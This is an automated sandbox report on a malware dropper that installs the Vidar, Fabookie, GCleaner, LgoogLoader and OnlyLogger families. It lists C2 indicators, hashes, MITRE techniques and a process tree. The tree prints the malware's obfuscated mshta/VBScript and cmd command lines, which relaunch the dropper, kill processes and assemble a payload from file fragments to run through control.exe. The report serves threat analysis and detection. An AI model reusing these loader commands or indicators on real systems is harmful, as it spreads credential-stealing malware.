fabookie | ced645d2249adc41f7340e1f9f76f576e336dc9c7c8affdb5b1e005faf528bd7

Resubmissions

14-07-2024 08:22

240714-j929savhlh 10

14-07-2024 07:28

240714-ja5kvstfnd 10

Analysis

max time kernel
5s
max time network
30s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14-07-2024 08:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
Size

4.9MB
MD5

44de9a092646de93067a5ae63cdb87de
SHA1

5db8c09d48e6e7602184634c1585d48f651d1197
SHA256

ced645d2249adc41f7340e1f9f76f576e336dc9c7c8affdb5b1e005faf528bd7
SHA512

2efd29a015b7d0986a879e47f2d93ef89f023f2f792404d253b241ceb2f8b7944f14e825f5eb1529ed7096506fb10fcde22d2e992553a8fe069dfa764a8a285a
SSDEEP

98304:FzzOsPu6locsuuFpSClTfqWrtCazwzs+CVGIOlmS23nlODn373muvk:pOSnlRvuOAmUwoQil4LWu8

Score

10^/10

fabookie gcleaner lgoogloader onlylogger vidar 933 downloader loader persistence spyware stealer

Malware Config

Extracted

Family

vidar

Version

41.1

Botnet

933

https://mas.to/@bardak1ho

Attributes

profile_id
933

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral1/files/0x00070000000234d8-124.dat	family_fabookie

Detects LgoogLoader payload 1 IoCs

resource	yara_rule
behavioral1/memory/2372-41-0x00000000009A0000-0x00000000009B2000-memory.dmp	family_lgoogloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 1 IoCs

resource	yara_rule
behavioral1/memory/1184-240-0x0000000000400000-0x000000000046A000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/memory/2376-239-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	sfx_123_206.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	setup_2.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	4MCYlgNAW.eXE
Key value queried	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 17 IoCs

pid	Process
1748	Chrome 5.exe
2372	inst001.exe
1992	DownFlSetup110.exe
2376	Firstoffer.exe
1184	setup.exe
1160	Install.EXE
1764	install.exe
440	sfx_123_206.exe
2720	7.exe
1616	setup_2.exe
2812	jhuuee.exe
4300	setup_2.tmp
3516	liuyan-game.exe
3160	11.exe
4332	setup_2.exe
2496	setup_2.tmp
3756	4MCYlgNAW.eXE

Loads dropped DLL 2 IoCs

pid	Process
4300	setup_2.tmp
2496	setup_2.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Install.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
4	iplogger.org
5	iplogger.org
11	iplogger.org
17	iplogger.org
20	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1112	2376	WerFault.exe	89

Kills process with taskkill 1 IoCs

evasion

pid	Process
4272	taskkill.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1992	DownFlSetup110.exe
Token: SeDebugPrivilege	2720	7.exe
Token: SeDebugPrivilege	3160	11.exe
Token: SeDebugPrivilege	4272	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4260 wrote to memory of 1748	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	86
PID 4260 wrote to memory of 1748	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	86
PID 4260 wrote to memory of 2372	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	87
PID 4260 wrote to memory of 2372	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	87
PID 4260 wrote to memory of 2372	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	87
PID 4260 wrote to memory of 1992	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	88
PID 4260 wrote to memory of 1992	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	88
PID 4260 wrote to memory of 2376	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	89
PID 4260 wrote to memory of 2376	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	89
PID 4260 wrote to memory of 2376	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	89
PID 4260 wrote to memory of 1184	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	90
PID 4260 wrote to memory of 1184	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	90
PID 4260 wrote to memory of 1184	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	90
PID 4260 wrote to memory of 1160	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	91
PID 4260 wrote to memory of 1160	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	91
PID 1160 wrote to memory of 1764	1160	Install.EXE	92
PID 1160 wrote to memory of 1764	1160	Install.EXE	92
PID 1160 wrote to memory of 1764	1160	Install.EXE	92
PID 4260 wrote to memory of 440	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	93
PID 4260 wrote to memory of 440	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	93
PID 4260 wrote to memory of 440	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	93
PID 4260 wrote to memory of 2720	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	94
PID 4260 wrote to memory of 2720	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	94
PID 4260 wrote to memory of 1616	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	95
PID 4260 wrote to memory of 1616	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	95
PID 4260 wrote to memory of 1616	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	95
PID 4260 wrote to memory of 2812	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	96
PID 4260 wrote to memory of 2812	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	96
PID 1616 wrote to memory of 4300	1616	setup_2.exe	97
PID 1616 wrote to memory of 4300	1616	setup_2.exe	97
PID 1616 wrote to memory of 4300	1616	setup_2.exe	97
PID 4260 wrote to memory of 3516	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	98
PID 4260 wrote to memory of 3516	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	98
PID 4260 wrote to memory of 3516	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	98
PID 440 wrote to memory of 472	440	sfx_123_206.exe	100
PID 440 wrote to memory of 472	440	sfx_123_206.exe	100
PID 440 wrote to memory of 472	440	sfx_123_206.exe	100
PID 4260 wrote to memory of 3160	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	101
PID 4260 wrote to memory of 3160	4260	44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe	101
PID 4300 wrote to memory of 4332	4300	setup_2.tmp	102
PID 4300 wrote to memory of 4332	4300	setup_2.tmp	102
PID 4300 wrote to memory of 4332	4300	setup_2.tmp	102
PID 4332 wrote to memory of 2496	4332	setup_2.exe	103
PID 4332 wrote to memory of 2496	4332	setup_2.exe	103
PID 4332 wrote to memory of 2496	4332	setup_2.exe	103
PID 472 wrote to memory of 3196	472	mshta.exe	104
PID 472 wrote to memory of 3196	472	mshta.exe	104
PID 472 wrote to memory of 3196	472	mshta.exe	104
PID 3196 wrote to memory of 3756	3196	cmd.exe	106
PID 3196 wrote to memory of 3756	3196	cmd.exe	106
PID 3196 wrote to memory of 3756	3196	cmd.exe	106
PID 3196 wrote to memory of 4272	3196	cmd.exe	107
PID 3196 wrote to memory of 4272	3196	cmd.exe	107
PID 3196 wrote to memory of 4272	3196	cmd.exe	107
PID 3756 wrote to memory of 3356	3756	4MCYlgNAW.eXE	109
PID 3756 wrote to memory of 3356	3756	4MCYlgNAW.eXE	109
PID 3756 wrote to memory of 3356	3756	4MCYlgNAW.eXE	109
PID 3356 wrote to memory of 2988	3356	mshta.exe	110
PID 3356 wrote to memory of 2988	3356	mshta.exe	110
PID 3356 wrote to memory of 2988	3356	mshta.exe	110
PID 3756 wrote to memory of 3528	3756	4MCYlgNAW.eXE	112
PID 3756 wrote to memory of 3528	3756	4MCYlgNAW.eXE	112
PID 3756 wrote to memory of 3528	3756	4MCYlgNAW.eXE	112
PID 3528 wrote to memory of 904	3528	mshta.exe	113

C:\Users\Admin\AppData\Local\Temp\44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\44de9a092646de93067a5ae63cdb87de_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4260
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  2⤵
  - Executes dropped EXE
  PID:1748
- C:\Users\Admin\AppData\Local\Temp\inst001.exe
  "C:\Users\Admin\AppData\Local\Temp\inst001.exe"
  2⤵
  - Executes dropped EXE
  PID:2372
- C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1992
- C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
  "C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"
  2⤵
  - Executes dropped EXE
  PID:2376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1012
    3⤵
    - Program crash
    PID:1112
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  PID:1184
- C:\Users\Admin\AppData\Local\Temp\Install.EXE
  "C:\Users\Admin\AppData\Local\Temp\Install.EXE"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe
    3⤵
    - Executes dropped EXE
    PID:1764
- C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
  "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:440
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:472
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3196
    - - C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
        
        ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3756
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3356
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
        7⤵
        
        PID:2988
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:3528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
        7⤵
        
        PID:904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
        8⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
        8⤵
        
        PID:4824
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\kZ_AmsXL.6G
        8⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        9⤵
        
        PID:3916
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f /Im "sfx_123_206.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
- C:\Users\Admin\AppData\Local\Temp\7.exe
  "C:\Users\Admin\AppData\Local\Temp\7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Users\Admin\AppData\Local\Temp\is-LM9IP.tmp\setup_2.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-LM9IP.tmp\setup_2.tmp" /SL5="$40254,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4332
    - - C:\Users\Admin\AppData\Local\Temp\is-G9VPL.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-G9VPL.tmp\setup_2.tmp" /SL5="$50254,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2496
- C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
  2⤵
  - Executes dropped EXE
  PID:2812
- C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe
  "C:\Users\Admin\AppData\Local\Temp\liuyan-game.exe"
  2⤵
  - Executes dropped EXE
  PID:3516
- C:\Users\Admin\AppData\Local\Temp\11.exe
  "C:\Users\Admin\AppData\Local\Temp\11.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2376 -ip 2376
1⤵
PID:3400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
4KB

MD5
1bfe591a4fe3d91b03cdf26eaacd8f89

SHA1
719c37c320f518ac168c86723724891950911cea

SHA256
9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

SHA512
02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
338B

MD5
78b22982f934c6977238aaf953857b37

SHA1
1449de7c9c3d9be867bbe4e6024ccc5a17daf637

SHA256
a2bb04ea70253e075dd2402e10d29b9345b40440293d395a0a9df33e2be048e1

SHA512
143317b42b35feaf4d102efd53a419b5f16cfe3d6dff5dae18da0e929a220ebcdcdc5f88979360ebb94d4c948d216cca5bcf6f708a4cfa264a1778b23d9ca8ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe

Filesize
8KB

MD5
5e2dbda60ebcc890fcbe04df9df53674

SHA1
703f35f880fd33bbdb9e5be85e350936bf70d73b

SHA256
bd36c700c8d850b1b2e762c16304323658845f2327162c9e6544b328d9a38996

SHA512
b05564f36f5c62e28cfe8ab2f5b97c2117e42654751a2150ec56685da193e1b7d9f856fa6f00772fd2d1dfff1d18c5c40850a045a8e10ea5b64d2b3e841559bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\7.exe

Filesize
8KB

MD5
f8e91b342ebce70392ab6e30f479b03a

SHA1
c1c2ef60eb84809363fa68800248fcdbd4e716c5

SHA256
2b93dcc527748dedc2e98226bb5715aced2af9ee1c525aad241d0f9957a7a5a9

SHA512
afd03bf12b8b0bf82481bfda3d0378ff2e3067600933e189880bf3b4b7ce37ba819350c96a013fa8a6e69a6886f556a3fac6f97d360b348b21ac07b3b66d802b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

Filesize
43KB

MD5
93460c75de91c3601b4a47d2b99d8f94

SHA1
f2e959a3291ef579ae254953e62d098fe4557572

SHA256
0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2

SHA512
4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

Download Submit
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe

Filesize
63KB

MD5
99487f0480515ae7d3ddf53661dbe73b

SHA1
1b827891b06b712b4fbdb06a376ba9738aa83769

SHA256
9cf12d4d774c6fc2075cd01999034186b7f8dd0ae0830569156c9e4d27357096

SHA512
01139b59bc5ac81e1ad83c22a88ad4d78ae31f2c9ea28a96d596af1b00e903137a35fdc88e94cc1110c8d2e163e89dad4e3dae71260a43e672cf7ea7bf7b9ded

Download Submit
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe

Filesize
757KB

MD5
c69af5d1287e7b8bd8624cc59cf40073

SHA1
45d0653cb46ef19ee75e68bbb2ee2675b98bcfe2

SHA256
f42988bbf4387ec249991ee083a1e8fe7ca10e0b6a6f8376e0fdbeca23962de1

SHA512
05d1185fb0941fe26b5b056ac9716712e10eb56d1935189ed0ef69e1f747d10512df7b7edb65c2f9af88d067fc67b9f8c84a13b09da5932ba0c08a248e0f960c

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.exe

Filesize
555KB

MD5
fca5c7ce896e4f860d2abe7eb7039f51

SHA1
040c5f470dccedf9c8a38d315b805c35801b12cd

SHA256
fcd9d2a204aa7443912f6c656122d97ef2a6186a2b47bcf99d6da59cb1a99f00

SHA512
cd17b1ce43d20dd9f5ebfb01eebdf1001c1ac9e77e5c1406bbfe91ab4a48690814e9abb48f6f8a26430ad2b7bb3d1a334f6ade2b5d0286cba8103a25f3318675

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.EXE

Filesize
596KB

MD5
9ea08213957dc34b997442720dfc4b69

SHA1
6ea4035a3db8d3016b5e5acf166c6c4fe0080cab

SHA256
8b5f1e434980d95f20f67b5a6817385b7f3726185acc4733c0365daa03edb5e6

SHA512
f6e45183ec8b7a633f18751128238890a90b8da866209d62a63bc4135e38b92915b2c87ae56fe7f44a5d0cc64321238551c8adc0ac7e20a84df441804bc21d74

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\4~T6.Kj6

Filesize
2B

MD5
ac6ad5d9b99757c3a878f2d275ace198

SHA1
439baa1b33514fb81632aaf44d16a9378c5664fc

SHA256
9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

SHA512
bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\JJdPql_.2B

Filesize
232KB

MD5
770b27fbf31087cc450783085296dd4b

SHA1
e11b5a284842ee442a18646611eb8d2fe34b3e59

SHA256
4338a7e054ebab8a375330b93e3d99faa0d3bccd53b2c0c5d3cfd560f977c386

SHA512
46b78e590c4634b8d16c9d9f72fd61bae01e35828b204b19a1ae13156dc688be994ac9bf7cdce048c4907eb52c7a9240705fad6c42899fec29ed32eff396bfcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Z8ISj6._Nm

Filesize
373KB

MD5
dcae4cf1f6df8ecee8a59809270d12df

SHA1
0e4fc026ae3795f14f3f7606bee2cde9ce0726bf

SHA256
caf0ca04e918436343125e04b29443d566ade372504568ee5a883958f67049ec

SHA512
cdea06242802cc4cb1b0ab2c663a7ee07abed801743036201576680eb61ae59da1f624428fed46cbeba9c225ffa4a068290f3fa26f4103abde76f3322c23d8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kdDPilen.~t5

Filesize
103KB

MD5
3a5d1bdea281c18ea044795ada56759b

SHA1
18a7d75b598dbd93baa5e77ce2e57bbbd18c0975

SHA256
436d167234c2913c51685816549be0a32fb5f6b4eb7724797aa211a6b98f1b54

SHA512
3f58d8c995b32f0724fb295c7fdcfed6f884a6d0338193bd29a6fc97d3ac907516dfc04aab0eb41f565db110fcb0a0d4e5a78140860b73fa2ad8696ccdc7ad3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\mzanA.e

Filesize
270KB

MD5
4048075ba32058b2ffb4d02fd8f88568

SHA1
9d35c34fdadce90fa5e8debce667429b9a126059

SHA256
98f66e3e4a0015b41c8598da139dc3ef4f9a7d5795ec8ebeeee1afa48bef2d6b

SHA512
4670adf32f1d1843e4fead5d78946c46ea1b5eaf3d1967ac87ff474b076d0f2f279ad115b22bb6dbfe72fc4b251f6fc86fa1cc12d5f24048e4801cafbef2eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\oAykH.~~

Filesize
261KB

MD5
da678f3df8a1104ec2ce8c9816b5156c

SHA1
f25f50f2a134270ff5d68fb9334e05e04a499798

SHA256
0f3a327e883e7fd4ec2377e0bf624504fdf91ba8a998d90bcd5d3c0895a26456

SHA512
b040d9211ba1504fd0807c9708a9e925fc33ec2819c2d4aa05462ccc1fc2794fd10d045533b9e4d584147f5c8882cfec0f06213e177b6b932d64fccd30852991

Download Submit
C:\Users\Admin\AppData\Local\Temp\inst001.exe

Filesize
213KB

MD5
23bcdc132d1f2aaf8d248b6a5bd21801

SHA1
2153acec77f4a57c621a3e38d523eb6df9b29134

SHA256
a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b

SHA512
d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-LM9IP.tmp\setup_2.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-NTSBK.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-QV2K7.tmp\idp.dll

Filesize
216KB

MD5
b37377d34c8262a90ff95a9a92b65ed8

SHA1
faeef415bd0bc2a08cf9fe1e987007bf28e7218d

SHA256
e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

SHA512
69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

Filesize
1.3MB

MD5
f9be28007149d38c6ccb7a7ab1fcf7e5

SHA1
eba6ac68efa579c97da96494cde7ce063579d168

SHA256
5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914

